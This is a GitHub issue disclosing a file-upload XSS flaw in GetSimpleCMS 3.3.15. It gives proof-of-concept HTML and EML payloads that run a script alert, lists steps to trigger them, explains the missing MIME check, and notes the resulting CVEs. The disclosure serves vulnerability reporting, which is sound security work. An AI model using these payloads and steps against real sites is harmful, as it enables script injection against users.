New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GetSimpleCMS allowed to some files that are able to execute HTML #1301

Open
Hexife opened this Issue Nov 14, 2018 · 2 comments

Comments

Projects
None yet
2 participants
@Hexife

Hexife commented Nov 14, 2018

Brief of this vulnerability
GetSimpleCMS allowed to upload the files that are able to execute HTML files.

There are 3 types of HTML executable files.

  • HTML File with no extension
  • HTML File with uncommon extension ( e.g. asdf)
  • HTML encoded as EML ( Triggered in IE only )
    (I also confirmed about SVG issue, but there was the issue already - #1292. )

Test Environment

  • Apache/2.4.18 (Debian)
  • PHP 5.6.38-2+ubuntu16.04.1+deb.sury.org+1 (cli)

Affect version
3.3.15

Payload

  • move to http://[address]:[port]/[app_path]/admin/upload.php with admin credential

  • Upload prepared malformed files.

  • HTML File with no extension

    • Filename - test
<html><head><title>XSS</title></head><body><script>alert('xss')</script></body></html>
  • HTML File with uncommon extension
    • Filename - test.asdf
<html><head><title>XSS</title></head><body><script>alert('xss')</script></body></html>
  • HTML File encoded as EML
    • Filename - test.eml
TESTEML
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

XSS Test
=3Cscript=3Ealert=281=29=3B=3C=2Fscript=3E
  1. Click the uploaded file name or
    move to http://[address]:[port]/[app_path]/data/uploads/[uploaded file].

  2. Profit!

Reason of This Vulnerability

In admin/upload-uploadify.php , Third parameter of validate_safe_file is not exist.

Function validate_safe_file is in admin/inc/security_functions.php and Third parameter, mime, will be null.

As a result, the file filtering of validate_safe_file depend on extensions. ( Not use MIME Type )

It can allows to upload the three type files that I introduced.

@tablatronix

This comment has been minimized.

Member

tablatronix commented Nov 15, 2018

It looks like this was supposed to do mime checking amd was removed or never implemented. Interesting

@Hexife

This comment has been minimized.

Hexife commented Nov 22, 2018

I got the CVE for this vulnerabilities - CVE-2018-19420, CVE-2018-19421.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment